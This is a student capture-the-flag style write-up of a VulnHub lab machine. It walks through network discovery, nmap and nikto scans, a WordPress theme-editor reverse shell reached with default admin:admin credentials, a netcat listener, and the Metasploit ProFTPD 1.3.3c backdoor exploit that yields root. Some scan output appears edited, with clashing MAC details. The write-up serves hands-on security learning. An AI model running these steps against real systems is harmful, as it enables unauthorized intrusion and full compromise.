Author: Chirag Khatri
Institution: Delhi Skill and Entrepreneurship University, Rajokri Campus
Branch: Computer Science
Project: Penetration Testing using Nmap and Metasploit
This project simulates a real-world attack scenario on a vulnerable virtual machine from VulnHub: Basic Pentesting. The goal is to identify vulnerabilities, exploit them, gain remote shell access, and escalate privileges to root.
The machine features multiple attack vectors and is intended for beginners to gain hands-on experience with reconnaissance, exploitation, and privilege escalation techniques.
- Kali Linux (VirtualBox)
- Nmap
- Netdiscover
- Nikto
- Enum4linux
- Metasploit (msfconsole)
- netcat (nc)
- WordPress reverse shell injection
netdiscover -r 192.168.122.0/24Currently scanning: 192.168.122.0/24 | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 120
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------
192.168.122.1 08:00:27:12:34:56 1 60 Oracle VirtualBox
192.168.122.144 08:00:27:AA:BB:CC 1 60 Oracle VirtualBoxnmap -sC -sV 192.168.122.144
nmap -sV -A 192.168.122.144
nmap -sV -A --script vuln 192.168.122.144
root@kali:~# nmap -sV -A --script vuln 192.168.122.144
Starting Nmap 7.80SVN ( https://nmap.org ) at 2021-05-21 03:30 EDT
Nmap scan report for 192.168.122.144
Host is up (0.0033s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
| ftp-proftpd-backdoor:
| This installation has been backdoored.
| Command: id
| Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
|_ sslv2-drown:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /secret/: Potentially interesting folder
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Description:
| Slowloris tries to keep many connections to the target web server open
| and hold them open as long as possible by sending partial requests.
| This can cause Denial Of Service.
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:07:5F:C6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 3.29 ms 192.168.122.144
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 417.02 secondsnikto -h http://192.168.122.144/
/secret/directory discovered- Added
vtcsecto/etc/hosts - Logged in using default creds
admin:admin
- Navigated to:
Appearance > Theme Editor > 404.php - Injected reverse shell payload
- Listener started:
nc -lvnp 4444- Accessed shell at:
http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php
msfconsole
use exploit/unix/ftp/proftpd_133c_backdoor
set RHOSTS 192.168.122.144
run
whoami
id
uname -a✔ Flag captured from /root/.
- Practical use of enumeration and scanning tools like Nmap, Nikto, Enum4linux
- How weak web applications and services (WordPress, ProFTPD) are exploited
- Gained insights into privilege escalation techniques
- Patch vulnerable software (e.g., upgrade ProFTPD)
- Disable unused services
- Use strong credentials (avoid admin:admin)
- Protect web apps with WAF and limit access to sensitive directories
⚠️ This project was conducted in a closed lab environment. For educational purposes only.